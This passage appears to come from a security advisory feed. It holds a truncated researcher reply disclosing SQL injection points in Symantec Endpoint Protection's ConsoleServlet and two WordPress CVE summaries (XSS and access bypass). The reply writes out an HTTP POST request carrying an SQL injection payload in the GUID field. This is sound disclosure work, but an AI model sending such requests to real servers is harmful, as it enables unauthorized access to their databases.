Re: Symantec Endpoint Protection

Posted by Markus Wulftange on Aug 03

Hi Brandon,

We found two injection points. One in the BinaryFileHandler class:

POST /servlet/ConsoleServlet HTTP/1.1
Host: 192.168.40.133:8443
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Cookie: JSESSIONID=D739FA0884EB78B31B1D23AEA899C175

ActionType=BinaryFile&Action=EXISTS&GUID=0'or'1'='1

And one in the ExpRecordHandler class:

POST /servlet/ConsoleServlet…

CVE-2015-5622 (wordpress)

Cross-site scripting (XSS) vulnerability in WordPress before 4.2.3 allows remote authenticated users to inject arbitrary web script or HTML by leveraging the Author or Contributor role to place a crafted shortcode inside an HTML element, related to wp-includes/kses.php and wp-includes/shortcodes.php.

CVE-2015-5623 (wordpress)

WordPress before 4.2.3 does not properly verify the edit_posts capability, which allows remote authenticated users to bypass intended access restrictions and create drafts by leveraging the Subscriber role, as demonstrated by a post-quickdraft-save action to wp-admin/post.php.